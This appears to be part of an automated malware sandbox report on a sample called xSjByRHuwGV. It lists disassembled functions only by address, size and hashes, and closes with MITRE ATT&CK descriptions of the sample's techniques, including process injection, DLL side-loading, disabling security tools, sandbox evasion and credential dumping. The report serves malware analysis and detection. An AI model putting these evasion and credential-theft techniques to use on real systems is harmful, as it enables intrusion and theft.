Instruction ID: 4dfeb3d5124f0e3e841d06094919da6e388a85a8c7c8f1c6fc5061dc04ed808c
Opcode Fuzzy Hash: ce8bbba011cb100bd45ee9479be22e6f3aac42a9b57557c13e0347bb3917ee11
Instruction Fuzzy Hash: EC31A1317001918FDF26AB29D854B3E7B66BB847D4B14046AE213DB2B2EF68DC408756

Function 02FE9920 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3383449331.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2fe0000_xSjByRHuwGV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01d182d67c0de51b89891aea287dd6707787d0a7e302f2b0e50301c563eb5354
Instruction ID: 7a5db30fece1c8332698e83821e8861f28fe51623a81f919297c58eed43f1c42
Opcode Fuzzy Hash: 01d182d67c0de51b89891aea287dd6707787d0a7e302f2b0e50301c563eb5354
Instruction Fuzzy Hash: 32212531401A115BCA06CB6EC8E064AB756FF923BC714831AC6BA476D9D771E812C6F0

Function 02FE2790 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3383449331.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2fe0000_xSjByRHuwGV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aaafd70353745ed2da346223367fbaf8796e3a1b163814995eae57f623b63c54
Instruction ID: 5c1b5afd38131b70ff0eef94c4107acaba2c8159c4ac1c8bffdfc9ff16769a57
Opcode Fuzzy Hash: aaafd70353745ed2da346223367fbaf8796e3a1b163814995eae57f623b63c54
Instruction Fuzzy Hash: 30316570D052498FCB05EFB8D8446EEBFF4FF5A304F0041AAC945AB225EB341A45CBA2

Function 02FE8380 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3383449331.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2fe0000_xSjByRHuwGV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42dee851126c2a38cf6a16a193d44a9ce450579a843345666b3a30b5bc922b41
Instruction ID: df348cd3ec24d967708dff362c9cff821b4e4ae11956ec2c03cbaa0ace8516fc
Opcode Fuzzy Hash: 42dee851126c2a38cf6a16a193d44a9ce450579a843345666b3a30b5bc922b41
Instruction Fuzzy Hash: 3C216A317012418BEF166B658554B3E269BEFC86D8F148039D607CB7A9EB6ACC42D382

Function 02FE62F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3383449331.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2fe0000_xSjByRHuwGV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b2bf08d69cb5c1be70d82e7be13fbe83f22162333a23a8e5f6436ed574e54fa
Instruction ID: 97f67516cb8e90d47e0d34d9bb29a35db5eaeacd7b8749ea75066ba5e435e2fd
Opcode Fuzzy Hash: 6b2bf08d69cb5c1be70d82e7be13fbe83f22162333a23a8e5f6436ed574e54fa
Instruction Fuzzy Hash: 77213B357029158FCB169B24C45892EB7A6FFD9795B058479D917DB394CF34DC02C780

Function 02FE28F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3383449331.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2fe0000_xSjByRHuwGV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3aacd904ca416cbdc88dad0d675ece178f8d0ae29995f878d95e9ed4f7f026d0
Instruction ID: b165683b98f345653f61106ea16acc677ce0041ce494a823eedde14ed67e4eeb
Opcode Fuzzy Hash: 3aacd904ca416cbdc88dad0d675ece178f8d0ae29995f878d95e9ed4f7f026d0
Instruction Fuzzy Hash: 0221B035E011069FCF15DF24D850AAE77A9EBED3A0B50C059ED0A9B340EB35EA42CBD1

Function 02FE9911 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3383449331.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2fe0000_xSjByRHuwGV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 961ae5a6775f6be36358f6e6732c66362685a9ec3766ac79844047bd80a5dbc8
Instruction ID: 7dbf9ee54639a81905acb03b42c6dcf7e6b456aa96c4a3479cdc1c05e8b7272b
Opcode Fuzzy Hash: 961ae5a6775f6be36358f6e6732c66362685a9ec3766ac79844047bd80a5dbc8
Instruction Fuzzy Hash: 2821D3318019115BCA06CA6EC8D0649B796BF913BC715831AD67A476D9D771E812C6E0

Function 0154D044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3382511737.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_154d000_xSjByRHuwGV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3738c890688bcfb62d1a53cdc6b786c8dcb8e93c86dea2b1352596fdbd2b83fc
Instruction ID: 5904b5194b144fab3cf3674f4c3ddb67cdef526072bf1bd2151fa110762d88a6
Opcode Fuzzy Hash: 3738c890688bcfb62d1a53cdc6b786c8dcb8e93c86dea2b1352596fdbd2b83fc
Instruction Fuzzy Hash: 00213475604204EFDB15CF64C9C4B2ABBB1FB88318F20C9ADE90D0F252D77AD446CA61

Function 02FE5649 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3383449331.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2fe0000_xSjByRHuwGV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6e4eb5538c69e51643c05ea9e972864bb629ece94dd51f690fd554147b9553d
Instruction ID: 1a6be7ffe5e14107d7c2fc5c0f6aa06c5a39f4ee8993873205287aab72738801
Opcode Fuzzy Hash: a6e4eb5538c69e51643c05ea9e972864bb629ece94dd51f690fd554147b9553d
Instruction Fuzzy Hash: 2921D475A0614D8FDF12AF64D444BAA3BA1FBD5358F008435E5069B354CB39DD51CB90

Function 02FE4285 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3383449331.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2fe0000_xSjByRHuwGV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bef0ffb75aa7a8f47b233ba61703818e11721712751f76615e3f0a4d592c43e7
Instruction ID: 0c5f098d7f6535eabd0b22c8174027c75a33518cd8688fec3e9b677195b2ef9e
Opcode Fuzzy Hash: bef0ffb75aa7a8f47b233ba61703818e11721712751f76615e3f0a4d592c43e7
Instruction Fuzzy Hash: 3F319578E11248CFCB45DFA8E58489DBBF2FF89345B2050A9E819AB325D739AD41CF00

Function 02FE9761 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3383449331.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2fe0000_xSjByRHuwGV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: caac4f2f437c08e2974d2a9b0f37d681b2d2984a1510828fc5924b56756211c0
Instruction ID: 1d3dacf18fa1d08627c552247364351d14a94992890acc63878b37d722c948ef
Opcode Fuzzy Hash: caac4f2f437c08e2974d2a9b0f37d681b2d2984a1510828fc5924b56756211c0
Instruction Fuzzy Hash: B9218B74E012489FDF06CFA5D550AEEBFB6EF89245F148069E512F6290DB38DA41CB20

Function 02FEAEF0 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3383449331.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2fe0000_xSjByRHuwGV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 032178fb950171d63665e663715ab32a8f5ee7668a068fbcc13c6bdfb640ec9f
Instruction ID: f1d7e1ae90e75b008d0031876c86d5960befc82105645d364183a8659538bf29
Opcode Fuzzy Hash: 032178fb950171d63665e663715ab32a8f5ee7668a068fbcc13c6bdfb640ec9f
Instruction Fuzzy Hash: 5B116D72B01208ABCB159F58D894B9EBBB6FB8C354F144066EA16A7394DB71DC10CBA0

Function 02FEF312 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3383449331.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2fe0000_xSjByRHuwGV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25f8766bfd4fd96403d036533d80eda53ac1e52c6823034bf25cf79ed8ea6055
Instruction ID: 397ec7e7b5dd9244fdd04aed02129979ff73be4ba9420dd81cc0d5f35e2bf386
Opcode Fuzzy Hash: 25f8766bfd4fd96403d036533d80eda53ac1e52c6823034bf25cf79ed8ea6055
Instruction Fuzzy Hash: 9E216374D0010ADFDB54DFA8D540B9EBFF1FF84304F1095A9C154AB255EB785A45CB80

Function 02FE6300 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3383449331.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2fe0000_xSjByRHuwGV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3edc056092961077ac4ef1a69b830b1c884a9c4ab721e9c48c1df43b69d851b
Instruction ID: b3f1e95b2462512f93bb4d2565d50593b80151f0b14296686aaec52a72eb910e
Opcode Fuzzy Hash: d3edc056092961077ac4ef1a69b830b1c884a9c4ab721e9c48c1df43b69d851b
Instruction Fuzzy Hash: 3B1125357025168FCB169B29C45892EB7AAFFD57947084078E917DB354CF34DC01C790

Function 02FE27F0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3383449331.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2fe0000_xSjByRHuwGV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a675332854dac4f98ec9f2b84951aa4108a3358cc8c97db49ceb9b027b46be2b
Instruction ID: 4abb774aa29fa6831ef9c107c01d1c493cf47e8e1926ca777d399f4ceceec712
Opcode Fuzzy Hash: a675332854dac4f98ec9f2b84951aa4108a3358cc8c97db49ceb9b027b46be2b
Instruction Fuzzy Hash: ED21F274D052498FCF01EFA8D9845EEBFF4FF4A304F1042AAD805B2225EB341A85CBA1

Function 02FEF320 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3383449331.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2fe0000_xSjByRHuwGV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c326c24ed99d7bbfe5857b38f0acc0a85714811475b2e08f5523763432d8e072
Instruction ID: ddf1068ffe97fccc006d78986d6bb3a6234cb1d87caf52bbfc76a5add7b48e49
Opcode Fuzzy Hash: c326c24ed99d7bbfe5857b38f0acc0a85714811475b2e08f5523763432d8e072
Instruction Fuzzy Hash: E8114CB4E0020ADFDB54EFA8D540B9EBFF1FB84304F1096A9C115AB255EB785A46DB80

Function 0154D03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3382511737.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_154d000_xSjByRHuwGV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
Instruction ID: a22a2816f9f1c13f6998ed95c079f2dc1dbf243c40de7ef1488801d5e778d3c6
Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
Instruction Fuzzy Hash: 3411A9755042848FCB12CF54C9C4B19BBB2FB88218F24C6A9D8494B256C33AD44ACB62

Function 02FE5E98 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3383449331.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2fe0000_xSjByRHuwGV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 859655a7bb9aa1487b93fa314bc934b4df77c347ad1f7404aad8c1931716ced6
Instruction ID: 070842fe7a53644eff6330e3c5ab40f408e66772c9e8dff526e055792065c933
Opcode Fuzzy Hash: 859655a7bb9aa1487b93fa314bc934b4df77c347ad1f7404aad8c1931716ced6
Instruction Fuzzy Hash: 6001D432B011196BDB16EE58DC50BEF3BDAEBC8694F148029F605EB284DE75CD1197A0

Function 02FEABE0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3383449331.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2fe0000_xSjByRHuwGV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a50a5f1f8aee604fae36075d6bf6191328ebbbbd789c6010e37ac27955adab0
Instruction ID: 0f5387ef76c1b7d7b490bbd02f92d8fc559c226eeb277110fedc2075678c3fc9
Opcode Fuzzy Hash: 3a50a5f1f8aee604fae36075d6bf6191328ebbbbd789c6010e37ac27955adab0
Instruction Fuzzy Hash: 57F09635700A104B8B176A3E9854A2AB6DEEFC8A99355407AEA07C7365EF61CC06C790

Function 02FEE8E8 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3383449331.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2fe0000_xSjByRHuwGV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08fd68bfeb6340fae3ad8bd0ea5118d62c4d9c733cea40a315809cfd0821c03d
Instruction ID: e04e79ecc1eef94e451434dd74d24d5d94772a1d510eac2b96993ebca3de0035
Opcode Fuzzy Hash: 08fd68bfeb6340fae3ad8bd0ea5118d62c4d9c733cea40a315809cfd0821c03d
Instruction Fuzzy Hash: 610117B8E0020AAFCB40CFA8E945AAEBBB1FB88300F108425D910B3354D7385A55DF90

Function 02FE28A2 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3383449331.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2fe0000_xSjByRHuwGV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5ec9f0137a846fd2b5a55a7ff20bab2a0c27abcb729534e6184e2fd4732ad98
Instruction ID: d8dceb01b4af50bcb045bde261191a0e291ef85af5ce8ff2d50a4993e5392d9c
Opcode Fuzzy Hash: f5ec9f0137a846fd2b5a55a7ff20bab2a0c27abcb729534e6184e2fd4732ad98
Instruction Fuzzy Hash: DDE06F30D253E28ACB02A7B0AC200DDBB30AE87210B0846E3C86036081EA202229C3A1

Function 02FE28B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3383449331.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2fe0000_xSjByRHuwGV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7926a8ba6362f8b99166dce7ab25177a73bf1062ade499f860d157b83bc13450
Instruction ID: 73aaf64c7bb5018b7e65ebf16bc7ffe48f22b4e9635f271f6c0d446ca8962ddd
Opcode Fuzzy Hash: 7926a8ba6362f8b99166dce7ab25177a73bf1062ade499f860d157b83bc13450
Instruction Fuzzy Hash: 57D02B31D2022B53CB00E7A1FC004DFF738EEC1220B404222E91033000FB302658C6F0

Function 02FE6739 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3383449331.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2fe0000_xSjByRHuwGV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7aecad56f1318ce11185ded25e3fc44948a9c72f706e35dc8b3cb7fff950040a
Instruction ID: a8dfc07ab80e8945473ef1f7725a7d5189ba313795c8f24347df4cd62b397ead
Opcode Fuzzy Hash: 7aecad56f1318ce11185ded25e3fc44948a9c72f706e35dc8b3cb7fff950040a
Instruction Fuzzy Hash: CED05E3100531A4AD305F738ED49B963F5EEFC2214F049928A1047A24AFFAC980446A0

Function 02FED6D4 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3383449331.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2fe0000_xSjByRHuwGV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0f9bf41104f3d19aa9f03c54ab2ca01b967377945b60db9d2469d45faa460cf
Instruction ID: 723d55b2cb8d8ca264b5ef37aeafc6d0529bd9850d3f6d98de17bfcd43c22df4
Opcode Fuzzy Hash: f0f9bf41104f3d19aa9f03c54ab2ca01b967377945b60db9d2469d45faa460cf
Instruction Fuzzy Hash: C8D04275E1510DCBCF20EFA8E4844DCBB71EB89325F10502AD926A3652D6345455CF11

Function 02FEAFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3383449331.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2fe0000_xSjByRHuwGV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b914be2aa6817b946de66f3ae6a20145e09aff6d8568bbfb7aca730116649ae
Instruction ID: 6eec2566c8067d1cab7c8bca60ef80162d2fbf347c9d62ac704fff1383dd957b
Opcode Fuzzy Hash: 7b914be2aa6817b946de66f3ae6a20145e09aff6d8568bbfb7aca730116649ae
Instruction Fuzzy Hash: 16D0673AB101089FCB149F98E8409DDF7B6FB98221B048127E925A3264C6319925DB50

Function 02FE6748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3383449331.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2fe0000_xSjByRHuwGV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28acb3340abe8e516f1c0afee143c9a539bc4dc6d55d987c26cd67eca8a4351c
Instruction ID: 9e4d9b14770463f02f7f7baeacca34b3317d8634eeaf4676886be651db0f9459
Opcode Fuzzy Hash: 28acb3340abe8e516f1c0afee143c9a539bc4dc6d55d987c26cd67eca8a4351c
Instruction Fuzzy Hash: 18C0123400430A8AD649FB75ED489193BAAFAD1204F40EA28A2092A649EFFD6D494A90

Function 02FE98F0 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3383449331.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2fe0000_xSjByRHuwGV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2de247877972eb3869458f3802c6cf171e87a799cb9d17e74290801d4e857394
Instruction ID: 29aa25ac826f26b1e31d241e0b912979927586cd0b7addc6874d511acad7aeda
Opcode Fuzzy Hash: 2de247877972eb3869458f3802c6cf171e87a799cb9d17e74290801d4e857394
Instruction Fuzzy Hash: 8EB092222130101FFA00E284EEE57FBBA0DCFC531AF249121A08484A86D128980281B0

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

